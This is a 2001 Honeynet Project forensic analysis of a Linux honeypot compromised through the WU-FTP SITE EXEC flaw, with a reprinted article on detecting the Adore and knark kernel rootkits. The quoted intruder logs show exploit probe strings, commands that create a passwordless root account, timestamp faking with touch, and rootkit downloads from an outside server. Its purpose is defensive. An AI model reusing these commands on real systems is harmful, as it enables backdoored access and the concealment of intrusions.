Intrusion Detection Analysis

Honeynet Project Scan 19


October 20, 2001

Document Status v. 1

Matthew M. Shannon MCSE, MCDBA










































Table Of Contents

Table of contents ................................................................................................. I...........

Requirements.......................................................................................................... 17

Methodology and Tools Used...................................................................... 18

Event Summary....................................................................................................... 19

Recommendation................................................................................................... 20

Event Analysis........................................................................................................ 21

Event Sequence.................................................................................................................. 21

Findings.............................................................................................................................. 26

Appendix...................................................................................................................... 28

Recovered Files.................................................................................................................. 28

Additional Information......................................................................................................... 28

Touch() Manual Page.......................................................................................................... 33
























On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotlyremotely  logging to (remote syslog server IP has been replaced). The compromised system has an IP of After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which isare encrypted). The attacker also tried to hide some of his edits from the MAC times.



  1. Which vulnerability did the intruder exploit?
  2. What ways, and in what order, did the intruder use to connect and run commands on the system?
  3. How did the intruder try to hide his edits from the MAC times?
  4. The intruder downloaded Rootkits, what were they called? Are they new/custom Rootkits?
  5. Recover (tell how you did it too) the Rootkits from the snort binary capture
  6. What does the Rootkit do to hide the presence of the attacker on the system?
  7. What did you learn from this exercise?
  8. How long did this challenge take you?


Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.




Methodology and Tools Used


In order to decode the packets and analyze the intrusion the analyst used a copy of Ethereal ( Ethereal has the ability to selectively decode TCP Streams and save them as ASCII text. This feature combined with many others made short work of analyzing the packet streams. In order to determine the types of attacks, the packet stream was also run through Snort ( an open-source Intrusion Detection System (IDS). Snort provided further information on the types of attacks that were attempted. Lastly, the provided Syslog file further clarified the chain of events.

Event Summary


On September 16th a Red Hat Linux 6.2 server was compromised. The intruder made use of a well-known FTP overflow exploit ( Following the success of the exploit the intruder created two user ID’s for future access. The intruder then reconnected using the newly created user ID’s and established a file download from a remote server.

 The purpose of a download is to obtain a specialized toolkit used to replace key system files and create a backdoor for easy re-entry. During the course of the attack and occupation, the intruder proceeded to make multiple connections to and from external machines via encrypted and unencrypted channels.




As part of a sound Information Security program, we recommend that an Information Security Policy be developed and used to insure strong controls, both preventive and corrective going forward. The Information Security policy would address the need to maintain accurate and timely backups, provide procedures for the timely application of system updates and patches, and remove informative banners from login prompts.

Through preparation and planning the risks associated with computer usage can be addressed and mitigated.

Event Analysis


Event Sequence


Failed Telnet Session

Source Information

Date/Time(Start/End):    2001-09-16 19:53:10/19:54:00              

Elapsed Time:                50 Seconds

IP Address:         

Location Name:             MIDO-IMPEX

Address:                       S.C. MIDO IMPEX S.R.L.

Address:                       9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country:                        RO



            The initial connection attempts received from the intruder are puzzling at first glance. The intruder attempts a sequence of user names and passwords that do not resemble typical usernames. Our assumption is that the intruder feels he has previously compromised this system and is attempting to reconnect using previously created user names and passwords. 

We find this to be true.   Based on information provided by the Honeynet Project , we know that the intruder  compromised this machine in the past. Therefore, his attempts to login represent formerly valid user ids on a typical compromised system.

            The failed login attempt prompts him to attempt to re-establish control on the machine.


ASCII Source


ÿû­ÿû ÿûÿû'ÿýÿû

ÿýÿý ÿý#ÿý'ÿü#ÿý­ÿûÿý
ÿú­ P ÿðÿú ÿðÿú'ÿðÿúÿðÿú  38400,38400ÿðÿú' ÿðÿú XTERMÿðÿýÿûÿý!ÿü

Red Hat Linux release 6.2 (Zoot)

Kernel 2.2.14-5.0 on an i586

ÿþÿü!login: nnoobbooddyy


Password: ultravirus


Login incorrect


login: nnoobbooddyy


Password: virus


Login incorrect


login: uuuuccpp


Password: Login timed out after 60 seconds




WU-FTP Site Exec Buffer OverFlow exploit to compromise system

Source Information

Date/Time(Start/End):    2001-09-16 19:55:45/20:56:14

Elapsed Time:                1 Hour

IP Address:         

Location Name:             MIDO-IMPEX

Address:                       S.C. MIDO IMPEX S.R.L.

Address:                       9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country:                        RO

CERT Advisory:   

RedHat Update:   




            Having determined that the system has FTP running, and finding that the FTP Daemon[1] is WU-FTP, the intruder decided to try the WU-FTP 2.6 Site Exec Buffer Overflow exploit. This exploit overloads the memory buffers used by the FTP Daemon causing it to crash and present a Root[2] level access.

Root access is the highest level of access on a Unix system. By using Root level privileges, the intruder is able to move through the compromised system’s files at will.

After the intruder has finished navigating the file system, he creates accounts for himself, which will be the accounts he will use for future access.

The first account he creates is named “Nobody”. This account does not have root level access, and it is no different than any existing user account. The second account he creates is named “dns”.  This account has root level access. The most likely reason for naming the root level account “dns” is to hide it among other system accounts, since DNS[3] is common service provided by Unix machines, it would reason that system accounts could exist named “dns”. The most likely reason for creating two accounts is to allow the intruder to telnet back to the system using the non-root ID, and then switch or “su”[4] to the root ID.

In order to hide the file edits needed to create the user accounts, the intruder uses the “touch”[5] command, which allows him to alter the dates associated with changes to the user files.


ASCII Source


220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.

USER ftp

331 Guest login ok, send your complete e-mail address as password.

PASS mozilla@

230 Guest login ok, access restrictions apply.

SITE EXEC %020d|%.f%.f|


200  (end of '%020d|%.f%.f|')

SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%. f%.f|%08x|%08x|

200-7 mmmmnnnn-2-2000-2000000000000000000000000000000000nan00000000-200000000000000000000000000000000000000000000000000000000000000000000000000-2-240nan|bfffdc7e|00000000|

200  (end of '7 mmmmnnnn%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|')




uid=0(root) gid=0(root) groups=50(ftp)


  4:17am  up 3 days, 10:25,  0 users,  load average: 0.00, 0.00, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT


bin   dev  home  lost+found  opt   root  tmp  var

boot  etc  lib                         mnt                        proc  sbin  usr

cd /usr





















cd local


bin  doc  etc  games  info  lib  man  sbin  src

cd bin


bash  bashbug

cd etc

/bin/sh: cd: etc: No such file or directory

ls --color



[mcd ..

cd etc


/bin/sh: ls--color: command not found





cd ..

cd doc


cd /tmp



cd /


bin   dev  home  lost+found  opt   root  tmp  var

boot  etc  lib mnt  proc  sbin  usr

cd /etc/X11/applnk





cd internet

/bin/sh: cd: internet: No such file or directory

cd Internet
















passwd nobody -d

Changing password for user nobody

Removing password for user nobody

passwd: Success

cd /

mkdir -p /etc/X11/applnk/Internet/.etc

mkdir -p /etc/X11/applnk/Internet/.etcpasswd

touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd

touch -acmr /etc /etc/X11/applnk/Internet/.etc

passwd nobody -d

/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash

passwd dns -d

touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd

touch -acmr /etc/X11/applnk/Internet/.etc /etc

Changing password for user nobody

Removing password for user nobody

passwd: Success

Changing password for user dns

Removing password for user dns

passwd: Success

cat passwd-















ftp:x:14:50:FTP User:/home/ftp:


xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false


postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash






Telnet to the compromised machine

Source Information

Date/Time(Start/End):    2001-09-16 20:32:10/20:55:01

Elapsed Time:                23 Minutes

IP Address:         

Location Name:             MIDO-IMPEX

Address:                       S.C. MIDO IMPEX S.R.L.

Address:                       9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country:                        RO



            Now that the intruder has established valid user ids on the system, he makes a telnet connection to the machine. As predicted the intruder uses the non-root ID to gain initial access to the system, then proceeds to “su” or switch to the root ID.

            Once the intruder is online and working as root, he determines that his login ID, “Nobody” is visible to other administration personnel. In order to correct this he must replace key system files and hide an evidence of his presence. To do this, the intruder makes an FTP[6] connection to a Romanian server and downloads a series of files.


ASCII Source


ÿû­ÿýÿý ÿý#ÿý'ÿû ÿûÿû'ÿýÿû

ÿú­ P ÿðÿú ÿðÿú'ÿðÿúÿðÿú  38400,38400ÿðÿú' ÿðÿú XTERMÿðÿýÿûÿý!ÿü

Red Hat Linux release 6.2 (Zoot)

Kernel 2.2.14-5.0 on an i586

ÿþÿü!login: nnoobbooddyy


Last login: Sun Sep 16 04:32:21 from

sh: ulimit: cannot modify limit: Operation not permitted

sh-2.03$ ssu ud ndsns


]0;nobody@ns1: /[root@ns1 /]# ww


  4:49am  up 3 days, 10:57,  1 user,  load average: 0.00, 0.00, 0.04

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT

nobody   pts/0    4:49am  0.00s  1.02s   ?     -

]0;nobody@ns1: /[root@ns1 /]# ccdd     cdc d/ /ttmmpp


]0;nobody@ns1: /tmp[root@ns1 /tmp]# mmcc  -s-


bash: mc: command not found

]0;nobody@ns1: /tmp[root@ns1 /tmp]# ff ffttpp  tteelleeppoorrtt..             cdc d //ddeevv//rrdd


]0;nobody@ns1: /dev/rd[root@ns1 rd]# ffttp pt etleeploreptor.t.ggo.or.oro


mkdir sdc0

cd sdc0





cd new

get Zer0.tar.gz

byget copy.tar.gz

get ooty.tar.gz


tar zxvf Z   

./Z    [1~[3~[3~cd


././G    24






FTP Connection to Romania

Source Information

Date/Time(Start/End):    2001-09-16 20:42:06/20:42:16

Elapsed Time:                10 Seconds

IP Address:          

Location Name:              RDSNET

Address:                       Romania Data Systems

Country:                        RO




            The following extract details the FTP transaction with the Romanian FTP Server. The intruder logs into the FTP server, and since FTP is transmitted in clear text we can see the password he uses. It is important to note that this password is most likely used by the intruder for access to other servers. It may also be interesting to note that the password, ‘gunoierul’ most closely translates to “scavenger, refuse-collector “, the significance of this is not yet known.

Following the login, the intruder downloads three separate files, “zer0.tar.gz”, “copy.tar.gz”, “ooty.tar.gz”. These files represent Rootkits. Rootkits[7] are automated scripts commonly used by intruders following a successful attack to create backdoors and hide any trace of their compromise.


ASCII Source




220-                           H O M E  .  R  O


220-                 This server is for HOME.RO members only.

220-                  Go to to register.


220-                      No anonymous access allowed.



220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) []

USER teleport

331 Password required for teleport.

PASS gunoierul

230 User teleport logged in.


215 UNIX Type: L8

CWD new

250 CWD command successful.


200 Type set to I.

PORT 192,168,1,102,4,2

200 PORT command successful.

RETR Zer0.tar.gz

150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).

226 Transfer complete.

PORT 192,168,1,102,4,3

200 PORT command successful.

RETR copy.tar.gz

150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).

226 Transfer complete.

PORT 192,168,1,102,4,4

200 PORT command successful.

RETR ooty.tar.gz

150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes).

226 Transfer complete.


221 Goodbye.




SSH Connection

Source Information

Date/Time(Start/End):    2001-09-16 20:51:58/21:06:58

Elapsed Time:                15 Minutes

IP Address:         

Location Name:             MIDO-IMPEX

Address:                       S.C. MIDO IMPEX S.R.L.

Address:                       9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country:                        RO



            The intruder completes an SSH connection to the compromised system. SSH[8] or Secure Shell is a encrypted protocol, therefore limited information is readily available. We are able to obtain the SSH Client tool and protocol version used by the intruder, SSH-1.5 on the PuTTY client. It is the analyst’s belief that the SSH session can be decrypted. However, the analyst would require the private key of the compromised machine and additional hours to work through the algorithm.

Without decryption, our best guess is that this is when the intruder executed the root kits and re-configured the server, which would account for the 15 minutes of elapsed time.


ASCII Source





.      ˜èb¯$uªP½




























  1. Which vulnerability did the intruder exploit?
    1. The intruder exploited the WU-FTP Buffer OverFlow Exploit. This exploit has been detailed on multiple websites. Further information can be found at:

1.       Cert Advisory:



  1. What ways, and in what order, did the intruder use to connect and run commands on the system?
    1. The intruder used the following connect and run commands on the compromised system.

                                                               i.      FTP

                                                             ii.      Telnet

                                                            iii.      SSH


  1. How did the intruder try to hide his edits from the MAC times?
    1. The intruder tried to hide his edits from the MAC times by using the touch command.


  1. The intruder downloaded Rootkits, what were they called? Are they new/custom Rootkits?
    1. According to the FTP Log, the intruder downloaded three distinct files. However during the analysis we were unable to recreate the individual files, but were able to recreate the contents of the following files.

                                                               i.      T0rn Rootkit

                                                             ii.      Adore Rootkit (Version 1 and 2)

                                                            iii.      Tls archive(?)

The contents of the download consisted of at least two root kits, the T0rn Rootkit and the Adore Rootkit(Versions 1 and 2). The remaining archive, labeled “tls” contained Perl scripts that could be considered part of a Rootkit. Based on reconnaissance done on the Rootkits, they have been around for considerable time, however the CVS file included in one of the archives suggest some modifications within the last two years.


  1. Recover (tell how you did it too) the Rootkits from the snort binary capture.
    1. All Rootkits are available in the appendix of this document. They were recovered by extraction from the Packet Dump(newdat3.log) using Ethereal ( and packet capture and browsing tool.

                                                               i.      T0rn kit

                                                             ii.      Adore kit

                                                            iii.      TLS kit


  1. What does the Rootkit do to hide the presence of the attacker on the system?
    1. Most Rootkits will make corrections and changes to individual files that are used during the login process. These changes remove the Trusted Path and allow the intruder elevated access.  The Adore Rootkit however, makes use of LKM or loadable kernel modules[9] to dynamically hide the intruder’s presence.


  1. What did you learn from this exercise?
    1. The exercise demonstrated the value of good backup and a sound patch/update policy. The WU-FTP compromise itself is many years old, and a patch is readily available.


  1. How long did this challenge take you?
    1. Total Hours 8

                                                               i.      3 hours decompiling the packet stream.

                                                             ii.      3 hours documenting findings.

                                                            iii.      2 hours searching for information on the discovered Rootkits.





Recovered Files













Adore Version 1














Adore Version 2
















Additional Information


't0rnkit' Rootkit


Since May of 2000, we have observed more than six different versions of a Rootkit being called 't0rnkit', or 'tornkit'. Rootkits are not a new idea and have been employed by intruders for several years. The important thing here is to be aware of the widespread nature of this particular activity and to insure compromised hosts are recovered using appropriate procedures and techniques. Various versions of 't0rnkit' include an installation script which attempts many of the following things

Most versions also include a trojan horse version of tcp_wrappers in RPM format named 'tcpd.rpm'. There is strong evidence that 't0rnkit' is undergoing active development at the time of this writing, so the exact composition of the Rootkit may vary from this description over time.



Adore Rootkit

Reprinted from (     




      Recently, there has been a lot of press about adore. Well, the worm adore not the LKM adore. So I decided to look into the LKM adore(everyone else has looked at the worm). BTW, if want to download adore go to


      Adore is a Linux LKM Rootkit. It is easy to install and only requires a few minor adjustments when configuring. Adore can be installed with a default configuration or the user can make changes to some of the code. The readme file recommends that the user change the settings for ELITE_CMD and for HIDDEN_PORT. When you run ./configure, adore asks you for a password. This is for the backdoor port (hence, change the HIDDEN_PORT) If you want more information on the install you will have to download it. I ran the default installation, which consisted of running./configure and make. After running make, you will see two files (ava, startadore). In order for adore too execute you have to run startadore. Once you run startadore the user can then run ava. Table 4 is the output from ./ava.




Usage: ./ava {h,u,r,R,i,v,U} [file, PID or dummy (for U)]


       h hide file

       u unhide file

       r execute as root

       R remove PID forever

       U uninstall adore

       i make PID invisible

       v make PID visible


Table 4. Ava output


Table 4 shows us the options that adore provides to us. I will not cover each switch and what it does only because it does not help us detect this Rootkit. Now that we have covered the basics of adore (LKM) lets look at how we detect adore and other Rootkits.


      Many Rootkits hide processes, directories, files and even connections. But many of them do so by modifying the source code of binaries such as ps, df, netstat, top and lsof. There are a couple of ways to detect these types of Rootkits (i.e. t0rn):



1) md5 checksums

2) Compiling these binaries from a known good source (i.e. cd-rom, disk).      

3) Some Rootkits have a default port that an administrator can focus in on.

4) Running a program such as chkRootkit


Many of the techniques used to detect Rootkits like t0rn are not effective against LKM Rootkits (chkRootkit can detect some of them). Since LKM Rootkits access the kernel, they can hide processes, connections, directories and files without modifying the binaries. MD5 checksums become useless because there are no files being modified. This means the checksums will not change. Checking ports MIGHT be an option BUT that only tells you that you have been “rooted”.


      Well, how can I detect these monsters? Easy. There is a program I highly recommend to everyone concerned with LKM Rootkits. This program is called KSTAT. You can find it at KSTAT works by checking the memory (/dev/kmem) for information about the host(including LKMs). Want to see what kstat looks like? Good. Here is the output for kstat:


Usage: kstat [-i iff] [-P] [-p pid] [-M] [-m addr] [-s]


-i    iff may be specified as 'all' or as name (e.g. eth0)

     displays info about the queried interface

-P    displays all processes

-p    pid is the process id of the queried task

-M    displays the kernel's LKMs' linked list

-m    addr is the hex address of the queried module

      displays info about the module to be found at addr

-s    displays info about the system calls' table



As you can see, kstat provides a person with many options for detecting these Rootkits. Lets go through some of the options and from these options we will learn how to detect the following LKM Rootkits:


1) knark

2) adore

3) rkit




BTW, if there’s any Rootkits I have omitted please let me know and I will update the paper. : ) Kstat –s seems to be the best way to detect LKM Rootkits. The other options are really great, but –s works all the time. Here is an output from kstat –s:


SysCall                         Address

sys_exit                        0xc0117ce4

sys_fork                        0xc0108ebc

sys_read                        0xc012604c

sys_write                       0xc0126110

sys_open                        0xc0125c10

sys_close                       0xc0125d60

sys_waitpid                     0xc0117ff8

sys_creat                       0xc0125ca4

sys_link                        0xc012de60

sys_unlink                      0xc012dc90

sys_execve                      0xc0108f18

sys_chdir                       0xc01254a0

sys_time                        0xc01184b4

sys_mknod                       0xc012d77c

sys_chmod                       0xc01256e4


           Table 5. kstat –s


Table 5 is not a complete output from kstat –s, but it does give us an idea as too what the output looks like. Remember –s provides us with a picture of the sys_call_table. Keep this information fresh as we will revisit this again later.


      Kstat –P is another switch that is very effective. Kstat -P shows us all of the processes running at that time. This includes the processes hidden by an LKM Rootkit.


Table 6 is an example of kstat –P:






 1     0     0   0     init


 2     1     0   0     kflushd


 3     1     0   0     kupdate


 4     1     0   0     kpiod


 5     1     0   0     kswapd


 6     1     0   0     mdrecoveryd


241   1      1   0     portmap  


256   1      0   0     lockd


257  256     0   0     rpciod


266   1      0   0     rpc.statd


280   1      0   0     apmd


331   1      0   0     syslogd





Table 6. kstat –P




When I first ran this program I wasn’t sure kstat could do what it said but…it proved my doubts WRONG. Here is what I did to verify this switch. I used ava -i 241(portmap). I then ran kstat –P. As you can see from table 6,  portmap(bold) shows up. I then ran ps-ef(Table 7)and could not find it. Lsof also did not show it. Table 7 is the output from ps –ef:





root         1     0  0 Mar30 ?        00:00:06 init [3]

root         2     1  0 Mar30 ?        00:00:00 [kflushd]

root         3     1  0 Mar30 ?        00:00:00 [kupdate]

root         4     1  0 Mar30 ?        00:00:00 [kpiod]

root         5     1  0 Mar30 ?        00:00:00 [kswapd]

root         6     1  0 Mar30 ?        00:00:00 [mdrecoveryd]

root       256     1  0 Mar30 ?        00:00:00 [lockd]

root       257   256  0 Mar30 ?        00:00:00 [rpciod]

root       266     1  0 Mar30 ?        00:00:00 rpc.statd

root       280     1  0 Mar30 ?        00:00:00 /usr/sbin/apmd -p 10 -w 5 -W -s

root       331     1  0 Mar30 ?        00:00:00 syslogd -m 0

root       340     1  0 Mar30 ?        00:00:00 klogd

nobody     354     1  0 Mar30 ?        00:00:00 identd -e -o

nobody     357   354  0 Mar30 ?        00:00:00 identd -e -o

nobody     359   357  0 Mar30 ?        00:00:00 identd -e -o

nobody     360   357  0 Mar30 ?        00:00:00 identd -e -o

nobody     361   357  0 Mar30 ?        00:00:00 identd -e -o

daemon     372     1  0 Mar30 ?        00:00:00 /usr/sbin/atd

root       386     1  0 Mar30 ?        00:00:00 crond

root       404     1  0 Mar30 ?        00:00:00 inetd

root       418     1  0 Mar30 ?        00:00:00 lpd

root       462     1  0 Mar30 ?        00:00:00 sendmail: accepting connections

root       477     1  0 Mar30 ?        00:00:00 gpm -t ps/2

root       491     1  0 Mar30 ?        00:00:01 httpd

xfs        531     1  0 Mar30 ?        00:00:00 xfs -droppriv -daemon -port -1

root       571     1  0 Mar30 tty1     00:00:00 login -- root   

root       572     1  0 Mar30 tty2     00:00:00 /sbin/mingetty tty2

root       573     1  0 Mar30 tty3     00:00:00 /sbin/mingetty tty3

root       574     1  0 Mar30 tty4     00:00:00 /sbin/mingetty tty4

root       575     1  0 Mar30 tty5     00:00:00 /sbin/mingetty tty5

root       576     1  0 Mar30 tty6     00:00:00 /sbin/mingetty tty6

nobody    4290   491  0 Apr01 ?        00:00:00 httpd

nobody    4291   491  0 Apr01 ?        00:00:00 httpd

nobody    4292   491  0 Apr01 ?        00:00:00 httpd

nobody    4293   491  0 Apr01 ?        00:00:00 httpd

nobody    4294   491  0 Apr01 ?        00:00:00 httpd

nobody    4295   491  0 Apr01 ?        00:00:00 httpd

nobody    4298   491  0 Apr01 ?        00:00:00 httpd

nobody    4299   491  0 Apr01 ?        00:00:00 httpd

root      8073   571  0 Apr02 tty1     00:00:00 -bash

root     10659  8073  0 11:24 tty1     00:00:00 ps -ef

            Table 7. ps –ef output


There are two other switches we will go over, they are kstat –p and kstat –M. First, lets look at kstat –p. kstat –p gives us more information about a process. In order to run kstat –p you will need to provide a process id. For example: kstat –p 241. This checks process 241 (portmap) and provide an output. Sometimes it can provide us with more information about a LKM Rootkit. TABLE 8 is the output from kstat –p 241:




Name:     portmap

State:    S (sleeping)

Pid:      241

Ppid:     1 (init)

Uid:      1     1     1     1

Gid:      0     0     0     0


Crucial Capabilities Check

Open Files

    0     CHAR        /dev/null

    1     CHAR        /dev/null

    2     CHAR        /dev/null



    7     FIFO        ///

    8     FIFO        ///

    21    CHAR        /dev/null

Table 8. kstat –p output


Finally, lets look at kstat –M. Under normal conditions an administrator can perform lsmod or more /proc/modules and find out what modules he/she are running. When a machine has been “rooted” you can’t trust lsmod for accurate information. Kstat –M will catch many of the basic LKM Rootkits that I have tested. Kstat –M list all of the modules loaded. I have seen it where kstat –M did list anything for knark, but…nothings perfect. The output from kstat –M is similar to lsmod.



Detecting knark, adore and other LKM Rootkits


So far we have covered a lot of material about LKM’s, Rootkits and kstat. Now we are going to put all of that together and learn how to detect some of the LKM Rootkits available today. 


The first LKM Rootkit we want to look at is knark. Knark is probably the best-known LKM Rootkit and one of the best written as well. Detecting it with kstat is fairly straight up as well. Remember Table 5? Well in order to detect a knark LKM Rootkit you will need to run kstat –s. Once ran you need to look for the following:


 sys_fork       0xc284652c WARNING! Should be at 0xc0108c88

sys_read       0xc2846868 WARNING! Should be at 0xc012699c

sys_execve     0xc2846bb8 WARNING! Should be at 0xc0108ce4

sys_kill       0xc28465d4 WARNING! Should be at 0xc01106b4

sys_ioctl      0xc2846640 WARNING! Should be at 0xc012ff78

sys_settimeofday 0xc2846a8c WARNING! Should be at 0xc0118364

sys_clone      0xc2846580 WARNING! Should be at 0xc0108ca4

 Table 9. knark detection



Lets take a closer look at this table and see what all of this mess means to us. First, we see that there are seven (7) sys_call_table entries that have warnings. Lets look at sys_settimeofday, here we see that currently it is making it’s home in memory at 0xc2846a8c. kstat –s tells us that this is wrong and it should be at 0xc0118364. When knark  is installed it changes the sys_call_table and the memory locations where you can find: sys_fork, sys_read, sys_execve, sys_kill, sys_ioctl, sys_settimeofday and sys_clone. This is how you could detect knark. Knowing which sys_call_table entries have been changed could help you identify the actual Rootkit itself. Knark changes seven(7) total. After running kstat –s, the next step would be to run ps-ef along with kstat –P and compare the two. If the are any differences in the two you can then take the correct action. Keep in mind that memory locations can change from box to box. As I said earlier, detecting LKM Rootkits with kstat is quite simple.


      Lets look at adore. Table 10 will show us what adore changes:






sys_fork       0xc4051428 WARNING! Should be at 0xc0108c88

sys_write      0xc4051590 WARNING! Should be at 0xc01269b8

sys_close      0xc405163c WARNING! Should be at 0xc01264a4

sys_kill       0xc40514d0 WARNING! Should be at 0xc011060c

sys_mkdir      0xc405172c WARNING! Should be at 0xc012e540

sys_clone      0xc405147c WARNING! Should be at 0xc0108ca4

sys_getdents   0xc40512a4 WARNING! Should be at 0xc013022c

Table 10. Adore detection


Adore changes seven (7) entries as well (just like knark). Knark and adore only change three (3) of the same sys_call_table entries. They are sys_fork, sys_kill, sys_clone. This is a good thing because it allows us the ability to detect each one separately. Again, once this has been done, the administrator can then run kstat –P and ps-ef and compare the two to figure out what processes are running and hiding.


The last Rootkit we will look at is rkit. This Rootkit does not hide itself as well as the other two do. As a matter of fact it only changes sys_setuid and can be found using kstat –M.



                LKM Rootkits can make a system administrator’s life a nightmare. They are hard to detect, but using tools like kstat and understanding what the Rootkit changes can make our life easier. Since tools like kstat are available, it would help systems administrators if they took a “picture” of the sys_call_table after a fresh install and any upgrades. This will help in identifying the good from the bad.  Although I have not had the time, one could write a shell | perl script to automate this process and check weekly, daily, every 10 minutes or whatever.







LKM Rootkits



Toby Miller is a GIAC Certified Analyst and MCP. He is currently working towards his CISSP and RHCE. Toby has contributed to 2 books, written papers for SANS, Securityfocus, performs Risk Assessments and runs a lab for a living. For entertainment Toby likes to analyze exploit signatures on his home network. Toby can be reached at

















Touch() Manual Page


            The following is a copy of the online manual page for the touch command.




touch - change file timestamps




touch [OPTION]... FILE...




or : ../src/touch [-acm] MMDDhhmm[YY] FILE... (obsolescent)



STAMP may be used without -t if none of -drt, nor --, are used. Note that the three time-date formats recognized for the -d and -t options and for the obsolescent argument are all different.


[1] In Unix, a Daemon is a system process or server process.

[2] Root level access is the highest level of access on a Unix system.

[3] DNS, Domain Name Service(Server) is a common Unix service used for Internet Traffic.

[4] Su is the Unix command that allows a user to assume another identity.

[5] See the Appendix for a copy of the touch command manual page.

[6] FTP, File Transfer Protocol, is an internet standard for easy transference of files between remote machines.

[7] Rootkits contain Trojan horse versions of system files and scripts to re-configure the system for the intruder.

[8] Secure Shell is an encrypted shell protocol used to connect to remote machines.

[9] LKM, Loadable Kernel Modules, these are dynamic pieces of software which are loaded into the main operating system when certain commands are run, they alter the output of the command to hide the presence of the intruder.